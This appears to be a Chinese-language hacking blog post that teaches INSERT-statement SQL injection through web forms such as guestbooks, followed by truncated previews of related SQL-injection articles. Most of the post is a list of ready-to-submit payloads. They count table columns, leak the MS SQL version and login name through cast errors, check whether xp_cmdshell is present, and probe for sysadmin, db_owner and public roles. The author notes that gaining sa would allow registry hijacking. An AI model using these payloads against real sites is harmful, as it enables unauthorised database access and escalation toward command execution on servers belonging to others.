yezi
當碰到一些特殊的站時可以試著用insert注入(如:留言版神馬的..前提是必須與資料庫互動)
首先我們先了解下insert的語法
insert into table (column_name_1,column_name_2,column_n) vlaues (value_1,value_2,value_n)
當value值數大於column時,資料庫就會爆出錯誤
於是當我們在網頁中提交
a』,null,null,null,null,null);– 如返回錯誤頁面
a』,null,null,null,null,null,null);– 如返回正常頁面(至於過濾單引號的問題就不在本文討論範圍內了)
說明當前表字段數為7(不知是我理解錯了不).
a』,cast(@@version as int),null,null,null,null,null);–試著爆出資料庫版本
–cast 將@@version的值以整型輸出到頁面
a』,cast(system_user as int),null,null,null,null,null);–當前登陸名
a』,null,null,null,null,null,null);(select count(*) from master.dbo.sysobjects where xtype = 『x』 and name = 『xp_cmdshell』); –是否存在xp_cmdshell
檢視許可權
a』,null,null,null,null,null,null);(select is_srvrolemember(『sysadmin』))=1; –sa ..如果爆出sa就爽了,可以劫持登錄檔神馬的..
a』,null,null,null,null,null,null);(select is_member(『db_owner』))=1;–dbo ..可以backup或參考
a』,null,null,null,null,null,null);(select is_member(『public』))=1;–public .這許可權還真沒成功過..
–如果有誤..請指正..thx
攻擊方法 談php mysql注射語句構造
一.前言 版本資訊 okphp bbs v1.3 開源版 由於 php和mysql本身得原因,php mysql的注射要比asp困難,尤其是注射時語句的構造方面更是個難點,本文主要是借對okphp bbs v1.3一些檔案得簡單分析,來談談php mysql注射語句構造方式,希望本文對你有點幫助。宣...
SQL注入式攻擊
常見的sql注入式攻擊過程類如 某個asp.net web應用有乙個登入頁面,這個登入頁面控制著使用者是否有權訪問應用,它要求使用者輸入乙個名稱和密碼。登入頁面中輸入的內容將直接用來構造動態的sql命令,或者直接用作儲存過程的引數。下面是asp.net應用構造查詢的乙個例子 system.text....
SQL注入式攻擊
1 為什麼會存在這種攻擊方式?大多數的b s系統或者c s系統,都會涉及到資料的儲存和互動,資料一般儲存在sql server mysql等資料庫中。因此,常見的資料互動中,往往需要根據使用者輸入的資訊進行資料庫查詢等操作 1 使用者登入,需要根據使用者填寫的使用者名稱和密碼查詢資料庫進行校驗。2 ...